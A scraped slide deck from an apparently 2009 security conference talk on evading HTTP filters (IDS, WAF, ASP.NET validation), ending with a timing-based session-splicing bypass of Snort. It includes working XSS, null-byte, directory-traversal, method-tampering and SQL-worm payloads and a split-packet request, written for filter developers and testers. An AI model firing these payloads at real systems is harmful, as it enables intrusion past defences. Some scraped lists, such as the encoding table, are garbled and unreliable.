Embed Size (px)
DESCRIPTION
Today security filters can be found on our network perimeter, on our servers, in our frameworks and applications. As our network perimeter becomes more secure, applications become more of a target. Security filters such as IDS and WAF are relied upon to protect applications. Intrusion detection evasion techniques were pioneered over a decade ago. How are today's filters withstanding ever evolving evasion tactics? The presentation will examine how evasion techniques worked in the past and provide insight into how these techniques can still work today; with a focus on HTTP attacks. A practical new way to bypass Snort will be demonstrated. A tool to test other IDS for the vulnerability in Snort will be demonstrated. (Outerz0ne 2009) Video of this presentation at Outerz0ne 5: http://www.irongeek.com/i.php?page=videos/rob-ragan-filter-evasion-houdini-on-the-wire
Citation preview
© 2007 Hewlett-Packard Development Company, L.P.The information contained herein is subject to change without notice
Filter EvasionHoudini on the Wire
Rob Ragan ([email protected])
HP Application Security Center
Overview• Filters
−Understanding different kinds of filters
−Identify the short comings of signature development
• Evasions−Examination of relevant evasion techniques
−Focus on HTTP attacks
• How to bypass Snort
Some Reasons to Elude a Filter• Money
−Spammers
• Fun−Porn
• Information−Truth seekers
• Illegal act−Stealing private data
Security Filters• Used to detect actions that attempt to
compromise a resource−Reactions
• Allow
• Deny
• Log
• Remove
• Usually a black box• Typically use signatures, which are black lists
Why is it important to understand evasion tactics?
• Cyber criminals−Using obfuscation
• Penetration testers−Need to keep up with cyber criminals latest
techniques
• Developers (filter creators)−Need to know how to properly build filters
• QA−Need to know how to properly test filters
HTTP Filters Are Everywhere
Filter Example
Intrusion Detection Systems (IDS)
Snort
Web Application Firewall (WAF)
ModSecurity
Server Add-on IIS UrlScan
Framework ASP.NET Request Validation
Browser IE8 XSS Filter
Application custom sanitizer See your code
New Filters• Announced 14 October 2008 • The DHS is funding new IDS/IPS
development−"The OISF was formed primarily to begin
the development of this new IDS/IPS engine, but will over time take on new projects and challenges." http://www.openinfosecfoundation.org
• Will they learn from history and other’s mistakes?
Filter Responsibility in the OSI Model
Who is responsible for each layer?• Attackers consistently moving up the stack
−The Network perimeter is safer than ever
−Applications are more exposed than ever
• Who creates filters?−Security professionals
−Open source community
−Corporations
• Ultimately developers need to be responsible
• Proper knowledge transfer isn’t occurring
In February of 1676 Sir Issac Newton wrote in a letter to Robert Hooke “If I have seen a little further it is by standing on the shoulders of Giants.” implying that while he may have come up with the final idea he was only able to do so because of the work of those that had gone before him.
Whisker's anti-IDS tactics · 1999
• Method matching– GET HEAD
• Url encoding– HEX %xx notation
• Double slashes– '/' '//'
• Reverse traversal– /dir/blahblah/../
• Self-reference directories– /dir/./././././ == /dir/
• Premature request ending– Stop at the first HTTP/1.?\r\n
• Parameter hiding– %3f ?
• HTTP mis-formatting– %20 %09 (TAB)
• Long Urls– GET /<random>/../dir/a.cgi
• DOS/Win directory syntax– '/' '\'
• NULL method processing– GET\0
• Case sensitivity – 'abc' 'ABC'
Details @ http://www.wiretrip.net/rfp/txt/whiskerids.html
Playbook – Let the games begin!• How to attack HTTP filters across
the stack−Canocalization
−Encoding
−Method tampering
−Poison NULL byte
−Whitespace mis-formatting
−Case Sensitivity
Canocalization• Process of converting data to the simplest
form• Multiple representations• Normalization
−Should use simplest form before performing detection
Canocalization• Microsoft Security Bulletin MS05-004 –ASP.NET Path Validation Vulnerability
• The Microsoft .NET forms authentication capability for ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) "\" (backslash) or (2) "%5C" (encoded backslash), aka "Path Validation Vulnerability.“
• Mozilla: http://www.target.com/secureDir\somefile.aspx
• Internet Explorer: http://www.target.com/secureDir%5Csomefile.aspx
Poison NULL Byte
•POST Rule Bypass Vulnerability•Vulnerable March 2007
−ModSecurity
•ASCIIZ −When assigning string data, the
assignment will stop if an embedded NULL byte is encountered
str = "ABC" + "\0" + "123";
str’s value is "ABC"
Bypass WAF• Content-Type: application/x-www-form-
urlencoded• POST data starts with unencoded NULL
byte
$ echo -e "\000&var=<script>alert(/xss/);</script>" > postdata
$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent <script>alert(/xss/);</script>
Full-Width/Half-Width Unicode• Bypass HTTP Filters • Vulnerable May 2007
−Cisco, 3Com, McAfee, Novell, ISS, CheckPoint, ModSecurity
• An evasion not an exploit• Full-width question mark (?) =
U+FF1F
Full-Width/Half-Width Unicode Attacks<?php
$input_var = "\xef\xbc\x9Cscript\xef\xbc\x9Ealert(document.location)\xef\xbc\x9C/script\xef\xbc\x9E";
header('Content-Type: text/html; charset=ISO-8859-1');
echo iconv('UTF-8', 'ISO-8859-1//TRANSLIT', $input_var);
?>
Output:
%uff1cscript%uff1Ealert('HAI')%uff1c/script%uff1E
%EF%BC%9Cscript%EF%BC%9Ealert(123)%EF%BC%9C/script%EF%BC%9E
HTTP Method Tampering
•Bypass URL Auth• Vulnerable June 2008
−Apache 2.2.6/PHP, Tomcat, WebSphere, WebLogic/JSP, ASP.NET
• Security mechanism fails to restrict HTTP methods
• GET functionality that is not idempotent or will execute with an arbitrary method
• Does your HTTP security filter check for the “ROB” method?
HTTP Method Tampering• RFC 2616: The HEAD method is identical
to GET except that the server MUST NOT return a message-body in the response
• GET requests to /admin/ required to come from a user in the admin role
• Expect HEAD,PUT,DELETE to be denied, right?
• Make sure the deny list is explicitly defined• Attack: HEAD /delete_user.asp?uid=666 HTTP/1.1
ASP.NET Validate Request
ASP.NET Framework XSS Filter• ASP.NET 2.0 checks for:
−&#
−< followed by (A-Z) or (a-z) then / or ! or ?
−Skip strings that start with “__” e.g. __VIEWSTATE
• Attack:"></XSS/*-*/STYLE=xss:e/**/xpression(alert(123))>
Encoding Attack• Directory Traversal Vulnerability• Vulnerable August 2008
−Apache Tomcat
• When context.xml or server.xml allows 'allowLinking' and 'URIencoding' as 'UTF-8'
%c0%ae = . (dot)
http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/foo
Evasions in RSnake’s XSS Cheat Sheet
•Null Byteperl -e
'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
•Case Insensitive<IMG SRC=JaVaScRiPt:alert('XSS')>
•Tab<IMG SRC="jav ascript:alert('XSS');">
•Newline<IMG SRC="jav
ascript:alert('XSS');">
Encoding
•RFC 1738−Only alphanumeric and special characters “$-_.
+!*'(),” can be included in the URL
• Space is not allowed %20 or +• RSnake’s cheat sheet contains 70 unique
ways to encode < (Less than)
70 Unique Ways to Encode <1. <
2. %3C
3. <
4. <
5. <
6. <
7. <
8. <
9. <
10. <
11. <
12. <
13. <
14. <
15. <
16. <
17. <
18. <
19. <
20. <
21. <
22. <
23. <
24. <
25. <
26. <
27. <
28. <
29. <
30. <
31. <
32. <
33. <
34. <
35. <
36. <
55. <
56. <
57. <
58. <
59. <
60. <
61. <
62. <
63. <
64. <
65. <
66. <
67. \x3c
68. \x3C
69. \u003c
70. \u003C
37. <
38. <
39. <
40. <
41. <
42. <
43. <
44. <
45. <
46. <
47. <
48. <
49. <
50. <
51. <
52. <
53. <
54. <
Still Partying Like It’s 1999• Method matching
– GET HEAD
• Url encoding– HEX %xx notation
• Double slashes– '/' '//'
• Reverse traversal– /dir/blahblah/../
• Self-reference directories– /dir/./././././ == /dir/
• Premature request ending– Stop at the first HTTP/1.?\r\n
• Parameter hiding– %3f ?
• HTTP mis-formatting– %20 %09 (TAB)
• Long Urls– GET /<random>/../dir/a.cgi
• DOS/Win directory syntax– '/' '\'
• NULL method processing– GET\0
• Case sensitivity – 'abc' 'ABC'
ASPROX (SQL Injection) Worm
•T-SQL CAST−Converts an expression of one data type to
another
−HEX and ASCII encode attacks
−Poison NULL byte
DECLARE%20@S%20CHAR(4000);SET%20
@S=C%00AST(0x4445434C4152452040
...
6F72%20AS%20CHAR(4000));EXEC(@S);--
Regular Expressions Are Hard• XSS Regex from ModSecurity(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:java|vb)script|shell)|ivescript)|(?:href|url)\b\W*?\b(?:(?:java|vb)script|shell)|mocha):|type\b\W*?\b(?:text\b(?:\W*?\b(?:j(?:ava)?|ecma)script\b|[vbscript])|application\b\W*?\bx-(?:java|vb)script\b)|s(?:(?:tyle\b\W*=.*\bexpression\b\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|(?:c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder|background-image:)\b|a(?:ctivexobject\b|lert\b\W*?\())|<(?:(?:body\b.*?\b(?:backgroun|onloa)d|input\b.*?\\btype\b\W*?\bimage)\b|!\[CDATA\[|script|meta)|(?:.(?:(?:execscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|\B@import)\b)
Catastrophic Backtracking• Do you worry about performance
when writing a Regex?• Beware of backtracking• Can lead to exponentially more CPU time for each additional input character O(n2)
• Make sure there is no way to match the same match
• Potential to DoS the filter?
Backtracking Example• (x+x+)+y
−One or more of the character X
−One or more of the character X
−One or more of the previous two matches combined
−Followed by a single character Y
PHPIDS Regex Smoketest
PHPIDS Regex Smoketest
White lists are good, but…• How many developers or QA engineers
know the entire subset of strings they’ll match or miss?
• What about signature writers?• Difficult to find a balance between FP and
FN• The underlying signature engine can have
problems
Regex Libs Can Have Vulnerabilities• Perl-Compatible Regular Expression (PCRE)
−Many serious vulnerabilities • CVE-2007-1659, CVE-2007-1660, CVE-2007-1661, CVE-
2007- 1662, CVE-2007-4766, CVE-2007-4767, CVE-2007-4768
• Even if you do everything else right, the Regex lib you use might get attacked
Biggest Target: Application Layer
• What about the Transport Layer?• 99 problems but TCP ain’t 1• Wrong!
Session Splicing• Network level attack• Send parts of the request in different
packets−"GET / HTTP/1.0" may be split across multiple
packets to be
−"GE", "T ", "/", " H", "T", "TP", "/1", ".0"
• Not the same as IP fragmentation
IP Fragmentation vs Session Splicing • IP Fragmentations
−If the packet is too large for the link layer a router can split it into multiple fragments
• Session Splicing−Purposefully delivering the payload over multiple
packets to evade detection. Smaller than it needs to be.
• IDS Defense−Fragment reassembly
−Session reassembly
−Send a reset [RST]
State of the Evasion• Does whisker’s session splicing tactic still
work on Snort?• Answer: No• Why?
Session Splicing 1999 vs 2009• The current implementation in whisker will
result in 1-3 characters in each packet, depending on your system and network speed
1999 2009
Bypass Snort• Pragmatic Session Splicing + Timing Attack
−Use the filter’s signatures to split the payload
−Vulnerable if the IDS stateful inspection timeout is less than session reassembly of the hosts it protects
−Similar to fragmentation attack but instead of at the IP level we move up to the TCP level
Time Splicer• The attack is practical if we split the session on the matches
found by the signature we're trying to evade • Attack: GET /index.php?param=<script>alert(123)</script> HTTP/1.1 Host:www.target.com
• Signature: Matches on <script>|</script> tags • Know the stateful inspection timeout for the IDS• Recursively find matches and split the attack string, then
send each splice in a new packet with time delay between each packet
Snort Preprocessors• HTTP Inspect + Stream4• Stateful inspection• Default timeout is 30 seconds
# stream4: stateful inspection/stream reassembly for Snort
#------------------------------------------------------------ # Use in concert with the -z [all|est] command line switch to defeat # stick/snot against TCP rules. Also performs full TCP stream # reassembly, stateful inspection of TCP streams, etc. Can statefully # detect various portscan types, fingerprinting, ECN, etc.
# stateful inspection directive
# no arguments loads the defaults (timeout 30, memcap 8388608)
POST /rootlogin.asp HTTP/1.1
Host: zero.spidynamics.com
Keep-Alive: 300
Content-Type: application/x-www-form-urlencoded
Content-Length: 102
txtPassPhrase=&txtName=%3Cs
…WAIT 30s…
cript%3Ealert%283%29%3C%2F
…WAIT 30s…
script%3E&txtHidden=This+was+hidden+from+the+user
Default Session Timeouts
What can you do?• Fingerprint for the
Server and Application technology
• Fingerprint an IDS
Server Type Timeout
Apache/PHP 10 minutes
IIS 5.0/ASP 15 minutes
IIS 6.0/ASP.NET 20 minutes
IIS 7.0/ASP.NET 20 minutes
DEMOTime Splicer
Questions?
Rob Ragan ([email protected])Check out the HP Security Laboratory on the Blogosphere
http://www.communities.hp.com/securitysoftware/blogs/spilabs/default.aspx
